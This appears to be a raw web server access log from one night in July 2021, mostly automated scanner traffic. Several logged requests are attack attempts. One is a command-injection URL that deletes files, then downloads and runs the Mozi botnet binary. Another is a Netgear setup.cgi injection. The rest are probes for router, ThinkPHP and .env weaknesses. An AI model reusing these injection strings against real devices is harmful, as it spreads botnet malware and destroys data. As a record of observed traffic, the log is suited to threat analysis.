161.117.239.46 - - [01/Jul/2021:00:00:07 +0200] "GET / HTTP/1.1" 200 1229 "-" "Go-http-client/1.1"
161.117.239.46 - - [01/Jul/2021:00:00:07 +0200] "GET / HTTP/1.1" 200 1229 "-" "Go-http-client/1.1"
161.117.239.46 - - [01/Jul/2021:00:00:07 +0200] "GET / HTTP/1.1" 200 1229 "-" "Go-http-client/1.1"
161.117.239.46 - - [01/Jul/2021:00:00:07 +0200] "GET / HTTP/1.1" 200 1229 "-" "Go-http-client/1.1"
161.117.239.46 - - [01/Jul/2021:00:00:07 +0200] "GET / HTTP/1.1" 200 1229 "-" "Go-http-client/1.1"
161.117.239.46 - - [01/Jul/2021:00:00:07 +0200] "GET / HTTP/1.1" 200 1229 "-" "Go-http-client/1.1"
161.117.239.46 - - [01/Jul/2021:00:00:07 +0200] "GET / HTTP/1.1" 200 1229 "-" "Go-http-client/1.1"
161.117.239.46 - - [01/Jul/2021:00:01:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "Go-http-client/1.1"
161.117.239.46 - - [01/Jul/2021:00:01:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "Go-http-client/1.1"
161.117.239.46 - - [01/Jul/2021:00:01:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "Go-http-client/1.1"
209.141.49.75 - - [01/Jul/2021:00:09:31 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.89:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
120.85.114.44 - - [01/Jul/2021:00:12:37 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 310 "-" "Hello, world"
209.141.49.75 - - [01/Jul/2021:00:29:20 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.80:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.87.43.130 - - [01/Jul/2021:00:35:44 +0200] "GET /api.php?key=1 HTTP/1.1" 404 312 "-" "Googlebot/2.1 (+http://www.google.com/bot.html)"
196.196.41.68 - - [01/Jul/2021:00:41:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
193.177.182.221 - - [01/Jul/2021:00:41:53 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
193.177.182.221 - - [01/Jul/2021:00:42:38 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
185.40.4.126 - - [01/Jul/2021:00:43:12 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
193.177.182.221 - - [01/Jul/2021:00:43:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
193.177.182.221 - - [01/Jul/2021:00:43:34 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
193.177.182.221 - - [01/Jul/2021:00:44:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
193.177.182.221 - - [01/Jul/2021:00:44:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
193.177.182.221 - - [01/Jul/2021:00:45:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
193.177.182.221 - - [01/Jul/2021:00:45:31 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
193.177.182.221 - - [01/Jul/2021:00:46:20 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
193.177.182.221 - - [01/Jul/2021:00:46:24 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
196.196.41.68 - - [01/Jul/2021:00:59:20 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
178.62.199.239 - - [01/Jul/2021:01:03:05 +0200] "GET /3000D00E0000FFFF3F0031313744373731343634304537353046007A7A7A7A7A7A7A7A7A7A7A7A7A7A7A0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000008047A7A7A7A7A7A7A7A7A0000000000000000000000000000000000000000000000000000000000000000 HTTP/1.1" 403 581 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)"
178.62.199.239 - - [01/Jul/2021:01:03:08 +0200] "\xbf\xbf\xaf\xaf~" 501 320 "-" "-"
178.62.199.239 - - [01/Jul/2021:01:03:09 +0200] "POST / HTTP/1.1" 200 1229 "-" "WinHttpClient"
178.62.199.239 - - [01/Jul/2021:01:03:10 +0200] "\x17\x03\x01\x01\x04e" 501 321 "-" "-"
178.62.199.239 - - [01/Jul/2021:01:03:10 +0200] "\x17\x03\x01\x01\x04e" 501 321 "-" "-"
79.134.76.57 - - [01/Jul/2021:01:03:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
95.0.184.156 - - [01/Jul/2021:01:03:58 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
167.250.140.166 - - [01/Jul/2021:01:04:09 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
193.112.110.35 - - [01/Jul/2021:01:05:25 +0200] "GET /TP/public/index.php HTTP/1.1" 404 324 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
193.112.110.35 - - [01/Jul/2021:01:05:26 +0200] "GET /TP/index.php HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
193.112.110.35 - - [01/Jul/2021:01:05:27 +0200] "GET /thinkphp/html/public/index.php HTTP/1.1" 404 335 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
193.112.110.35 - - [01/Jul/2021:01:05:27 +0200] "GET /html/public/index.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
193.112.110.35 - - [01/Jul/2021:01:05:28 +0200] "GET /public/index.php HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
193.112.110.35 - - [01/Jul/2021:01:05:28 +0200] "GET /TP/html/public/index.php HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
193.112.110.35 - - [01/Jul/2021:01:05:29 +0200] "GET /elrekt.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
193.112.110.35 - - [01/Jul/2021:01:05:30 +0200] "GET /index.php HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
193.112.110.35 - - [01/Jul/2021:01:05:30 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
81.182.55.11 - - [01/Jul/2021:01:10:28 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
196.196.41.68 - - [01/Jul/2021:01:11:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
1.116.223.165 - - [01/Jul/2021:01:22:53 +0200] "GET /TP/public/index.php HTTP/1.1" 404 324 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
1.116.223.165 - - [01/Jul/2021:01:22:53 +0200] "GET /TP/index.php HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
1.116.223.165 - - [01/Jul/2021:01:22:54 +0200] "GET /thinkphp/html/public/index.php HTTP/1.1" 404 335 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
1.116.223.165 - - [01/Jul/2021:01:22:54 +0200] "GET /html/public/index.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
1.116.223.165 - - [01/Jul/2021:01:22:55 +0200] "GET /public/index.php HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
1.116.223.165 - - [01/Jul/2021:01:22:55 +0200] "GET /TP/html/public/index.php HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
1.116.223.165 - - [01/Jul/2021:01:22:56 +0200] "GET /elrekt.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
1.116.223.165 - - [01/Jul/2021:01:22:56 +0200] "GET /index.php HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
1.116.223.165 - - [01/Jul/2021:01:22:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
167.99.212.33 - - [01/Jul/2021:01:38:19 +0200] "GET /3000D00E0000FFFF3F0031313744373731343634304537353046007A7A7A7A7A7A7A7A7A7A7A7A7A7A7A0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000008047A7A7A7A7A7A7A7A7A0000000000000000000000000000000000000000000000000000000000000000 HTTP/1.1" 403 581 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)"
167.99.212.33 - - [01/Jul/2021:01:38:22 +0200] "\xbf\xbf\xaf\xaf~" 501 320 "-" "-"
167.99.212.33 - - [01/Jul/2021:01:38:22 +0200] "POST / HTTP/1.1" 200 1229 "-" "WinHttpClient"
167.99.212.33 - - [01/Jul/2021:01:38:23 +0200] "\x17\x03\x01\x01\x04e" 501 321 "-" "-"
167.99.212.33 - - [01/Jul/2021:01:38:23 +0200] "\x17\x03\x01\x01\x04e" 501 321 "-" "-"
199.19.225.175 - - [01/Jul/2021:01:38:49 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.89:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
141.213.13.200 - - [01/Jul/2021:01:51:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
194.195.113.68 - - [01/Jul/2021:01:58:04 +0200] "GET /3000D00E0000FFFF3F0031313744373731343634304537353046007A7A7A7A7A7A7A7A7A7A7A7A7A7A7A0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000008047A7A7A7A7A7A7A7A7A0000000000000000000000000000000000000000000000000000000000000000 HTTP/1.1" 403 581 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)"
194.195.113.68 - - [01/Jul/2021:01:58:08 +0200] "\xbf\xbf\xaf\xaf~" 501 320 "-" "-"
194.195.113.68 - - [01/Jul/2021:01:58:08 +0200] "POST / HTTP/1.1" 200 1229 "-" "WinHttpClient"
194.195.113.68 - - [01/Jul/2021:01:58:10 +0200] "\x17\x03\x01\x01\x04e" 501 321 "-" "-"
194.195.113.68 - - [01/Jul/2021:01:58:10 +0200] "\x17\x03\x01\x01\x04e" 501 321 "-" "-"
27.46.30.244 - - [01/Jul/2021:01:59:06 +0200] "POST /HNAP1/ HTTP/1.0" 404 311 "-" "-"
165.227.23.18 - - [01/Jul/2021:02:03:55 +0200] "\x16\x03\x03\x01\xa6\x01" 501 321 "-" "-"
165.227.23.18 - - [01/Jul/2021:02:03:55 +0200] "\x16\x03\x03\x01\xa6\x01" 501 321 "-" "-"
165.227.23.18 - - [01/Jul/2021:02:03:55 +0200] "\x16\x03\x03\x01W\x01" 501 321 "-" "-"
165.227.23.18 - - [01/Jul/2021:02:03:56 +0200] "\x16\x03\x03\x01I\x01" 501 321 "-" "-"
165.227.23.18 - - [01/Jul/2021:02:03:56 +0200] "\x16\x03\x03\x01\x9a\x01" 501 321 "-" "-"
165.227.23.18 - - [01/Jul/2021:02:03:56 +0200] "\x16\x03\x02\x01\x9b\x01" 501 321 "-" "-"
165.227.23.18 - - [01/Jul/2021:02:03:57 +0200] "\x16\x03\x01\x01\xa8\x01" 501 321 "-" "-"
165.227.23.18 - - [01/Jul/2021:02:03:57 +0200] "\x16\x03\x01\x01\xa8\x01" 501 321 "-" "-"
165.227.23.18 - - [01/Jul/2021:02:03:57 +0200] "\x16\x03\x01\x01\x9e\x01" 501 321 "-" "-"
165.227.23.18 - - [01/Jul/2021:02:03:58 +0200] "\x16\x03\x01\x01\xb5\x01" 501 321 "-" "-"
34.79.107.251 - - [01/Jul/2021:02:04:31 +0200] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.25.1"
114.239.142.74 - - [01/Jul/2021:02:13:24 +0200] "POST /HNAP1/ HTTP/1.0" 404 311 "-" "-"
5.55.180.68 - - [01/Jul/2021:02:26:11 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
54.67.38.72 - - [01/Jul/2021:02:26:51 +0200] "OPTIONS / HTTP/1.1" 200 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
44.234.35.197 - - [01/Jul/2021:02:27:43 +0200] "OPTIONS / HTTP/1.1" 200 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
44.234.25.240 - - [01/Jul/2021:02:28:25 +0200] "OPTIONS / HTTP/1.1" 200 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
136.144.41.178 - - [01/Jul/2021:02:34:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
202.62.49.43 - - [01/Jul/2021:02:39:12 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
162.62.123.46 - - [01/Jul/2021:02:44:41 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
105.163.59.8 - - [01/Jul/2021:02:47:07 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
45.9.150.92 - - [01/Jul/2021:02:47:41 +0200] "\x16\x03\x01\x014\x01" 501 321 "-" "-"
174.138.37.134 - - [01/Jul/2021:02:52:04 +0200] "GET /3000D00E0000FFFF3F0031313744373731343634304537353046007A7A7A7A7A7A7A7A7A7A7A7A7A7A7A0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000008047A7A7A7A7A7A7A7A7A0000000000000000000000000000000000000000000000000000000000000000 HTTP/1.1" 403 581 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)"
174.138.37.134 - - [01/Jul/2021:02:52:07 +0200] "\xbf\xbf\xaf\xaf~" 501 320 "-" "-"
174.138.37.134 - - [01/Jul/2021:02:52:08 +0200] "POST / HTTP/1.1" 200 1229 "-" "WinHttpClient"
174.138.37.134 - - [01/Jul/2021:02:52:09 +0200] "\x17\x03\x01\x01\x04e" 501 321 "-" "-"
174.138.37.134 - - [01/Jul/2021:02:52:09 +0200] "\x17\x03\x01\x01\x04e" 501 321 "-" "-"
23.129.64.130 - - [01/Jul/2021:02:54:04 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
117.213.9.205 - - [01/Jul/2021:02:54:16 +0200] "POST /GponForm/diag_Form?images/ HTTP/1.1" 404 319 "-" "Hello, World"
186.87.84.240 - - [01/Jul/2021:02:59:20 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
136.144.41.73 - - [01/Jul/2021:03:00:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
110.153.68.150 - - [01/Jul/2021:03:10:52 +0200] "POST /GponForm/diag_Form?images/ HTTP/1.1" 404 319 "-" "Hello, World"
40.117.46.233 - - [01/Jul/2021:03:11:28 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Anarchy99"
40.117.46.233 - - [01/Jul/2021:03:11:28 +0200] "POST / HTTP/1.1" 200 1229 "-" "Anarchy99"
35.81.150.239 - - [01/Jul/2021:03:15:42 +0200] "OPTIONS / HTTP/1.1" 200 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
185.220.100.252 - - [01/Jul/2021:03:16:19 +0200] "HEAD /1sxA HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.16 Safari/537.36"
165.227.23.18 - - [01/Jul/2021:03:18:24 +0200] "\x16\x03\x01" 501 318 "-" "-"
185.165.190.17 - - [01/Jul/2021:03:25:38 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
185.165.190.17 - - [01/Jul/2021:03:25:39 +0200] "GET /robots.txt HTTP/1.1" 404 315 "-" "-"
185.165.190.17 - - [01/Jul/2021:03:25:39 +0200] "GET /sitemap.xml HTTP/1.1" 404 316 "-" "-"
185.165.190.17 - - [01/Jul/2021:03:25:40 +0200] "GET /.well-known/security.txt HTTP/1.1" 404 329 "-" "-"
185.165.190.17 - - [01/Jul/2021:03:25:42 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0"
34.79.68.246 - - [01/Jul/2021:03:25:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.25.1"
196.196.41.68 - - [01/Jul/2021:03:28:38 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
151.243.97.213 - - [01/Jul/2021:03:29:37 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
44.234.25.240 - - [01/Jul/2021:03:37:55 +0200] "OPTIONS / HTTP/1.1" 200 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
162.142.125.38 - - [01/Jul/2021:03:39:59 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
58.76.188.73 - - [01/Jul/2021:03:39:50 +0200] "POST /HNAP1/ HTTP/1.0" 404 311 "-" "-"
162.142.125.37 - - [01/Jul/2021:03:40:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.248.133.40 - - [01/Jul/2021:03:40:06 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
178.72.77.239 - - [01/Jul/2021:03:39:55 +0200] "POST /HNAP1/ HTTP/1.0" 404 311 "-" "-"
172.104.138.223 - - [01/Jul/2021:03:42:53 +0200] "GET /fuN3 HTTP/1.0" 404 305 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36"
54.67.86.130 - - [01/Jul/2021:03:49:45 +0200] "OPTIONS / HTTP/1.1" 200 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
178.72.70.222 - - [01/Jul/2021:03:53:16 +0200] "POST /HNAP1/ HTTP/1.0" 404 311 "-" "-"
174.138.37.134 - - [01/Jul/2021:03:55:54 +0200] "GET /3000D00E0000FFFF3F0031313744373731343634304537353046007A7A7A7A7A7A7A7A7A7A7A7A7A7A7A0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000008047A7A7A7A7A7A7A7A7A0000000000000000000000000000000000000000000000000000000000000000 HTTP/1.1" 403 581 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)"
174.138.37.134 - - [01/Jul/2021:03:55:57 +0200] "\xbf\xbf\xaf\xaf~" 501 320 "-" "-"
174.138.37.134 - - [01/Jul/2021:03:55:57 +0200] "POST / HTTP/1.1" 200 1229 "-" "WinHttpClient"
174.138.37.134 - - [01/Jul/2021:03:55:59 +0200] "\x17\x03\x01\x01\x04e" 501 321 "-" "-"
174.138.37.134 - - [01/Jul/2021:03:55:59 +0200] "\x17\x03\x01\x01\x04e" 501 321 "-" "-"
82.137.217.159 - - [01/Jul/2021:03:56:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
196.196.41.68 - - [01/Jul/2021:03:57:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
20.204.24.206 - - [01/Jul/2021:03:59:36 +0200] "\x16\x03\x03" 501 318 "-" "-"
20.204.24.206 - - [01/Jul/2021:03:59:37 +0200] "\x16\x03\x03" 501 318 "-" "-"
186.33.125.87 - - [01/Jul/2021:04:00:00 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
199.19.225.175 - - [01/Jul/2021:04:02:54 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.87:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
182.126.241.186 - - [01/Jul/2021:04:03:30 +0200] "POST /GponForm/diag_Form?images/ HTTP/1.1" 404 319 "-" "Hello, World"
92.118.160.53 - - [01/Jul/2021:04:09:13 +0200] "GET / HTTP/1.1" 200 1229 "-" "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com"
77.159.91.131 - - [01/Jul/2021:04:15:28 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
196.196.41.68 - - [01/Jul/2021:04:16:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
209.90.225.218 - - [01/Jul/2021:04:17:56 +0200] "HEAD /robots.txt HTTP/1.0" 404 - "-" "-"
209.141.49.75 - - [01/Jul/2021:04:25:41 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.80:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
209.90.225.218 - - [01/Jul/2021:04:31:29 +0200] "HEAD /robots.txt HTTP/1.0" 404 - "-" "-"
209.90.225.218 - - [01/Jul/2021:04:31:37 +0200] "HEAD /robots.txt HTTP/1.0" 404 - "-" "-"
209.90.225.218 - - [01/Jul/2021:04:31:50 +0200] "HEAD /robots.txt HTTP/1.0" 404 - "-" "-"
209.90.225.218 - - [01/Jul/2021:04:31:51 +0200] "HEAD /robots.txt HTTP/1.0" 404 - "-" "-"
209.90.225.218 - - [01/Jul/2021:04:32:13 +0200] "HEAD /robots.txt HTTP/1.0" 404 - "-" "-"
209.90.225.218 - - [01/Jul/2021:04:32:39 +0200] "HEAD /robots.txt HTTP/1.0" 404 - "-" "-"
209.90.225.218 - - [01/Jul/2021:04:32:49 +0200] "HEAD /robots.txt HTTP/1.0" 404 - "-" "-"
209.90.225.218 - - [01/Jul/2021:04:32:57 +0200] "HEAD /robots.txt HTTP/1.0" 404 - "-" "-"
209.90.225.218 - - [01/Jul/2021:04:33:00 +0200] "HEAD /robots.txt HTTP/1.0" 404 - "-" "-"
192.241.221.28 - - [01/Jul/2021:04:35:50 +0200] "GET /ReportServer HTTP/1.1" 404 317 "-" "Mozilla/5.0 zgrab/0.x"
192.241.221.28 - - [01/Jul/2021:04:35:51 +0200] "GET /ReportServer HTTP/1.1" 404 317 "-" "Mozilla/5.0 zgrab/0.x"
192.241.221.28 - - [01/Jul/2021:04:36:01 +0200] "GET /ReportServer HTTP/1.1" 404 317 "-" "Mozilla/5.0 zgrab/0.x"
192.241.221.28 - - [01/Jul/2021:04:36:09 +0200] "GET /ReportServer HTTP/1.1" 404 317 "-" "Mozilla/5.0 zgrab/0.x"
192.241.221.28 - - [01/Jul/2021:04:36:13 +0200] "GET /ReportServer HTTP/1.1" 404 317 "-" "Mozilla/5.0 zgrab/0.x"
192.241.221.28 - - [01/Jul/2021:04:36:57 +0200] "GET /ReportServer HTTP/1.1" 404 317 "-" "Mozilla/5.0 zgrab/0.x"
192.241.221.28 - - [01/Jul/2021:04:38:08 +0200] "GET /ReportServer HTTP/1.1" 404 317 "-" "Mozilla/5.0 zgrab/0.x"
192.241.221.28 - - [01/Jul/2021:04:39:21 +0200] "GET /ReportServer HTTP/1.1" 404 317 "-" "Mozilla/5.0 zgrab/0.x"
192.241.221.28 - - [01/Jul/2021:04:40:20 +0200] "GET /ReportServer HTTP/1.1" 404 317 "-" "Mozilla/5.0 zgrab/0.x"
192.241.221.28 - - [01/Jul/2021:04:40:29 +0200] "GET /ReportServer HTTP/1.1" 404 317 "-" "Mozilla/5.0 zgrab/0.x"
196.196.41.68 - - [01/Jul/2021:04:43:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
35.81.150.239 - - [01/Jul/2021:04:43:59 +0200] "OPTIONS / HTTP/1.1" 200 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
199.19.224.201 - - [01/Jul/2021:04:44:12 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.84:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
177.91.52.200 - - [01/Jul/2021:04:50:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
196.196.41.68 - - [01/Jul/2021:04:54:04 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
49.143.32.6 - - [01/Jul/2021:04:56:51 +0200] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0" 404 310 "-" "-"
39.106.182.149 - - [01/Jul/2021:05:07:25 +0200] "GET /TP/public/index.php HTTP/1.1" 404 324 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
39.106.182.149 - - [01/Jul/2021:05:07:26 +0200] "GET /TP/index.php HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
39.106.182.149 - - [01/Jul/2021:05:07:26 +0200] "GET /thinkphp/html/public/index.php HTTP/1.1" 404 335 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
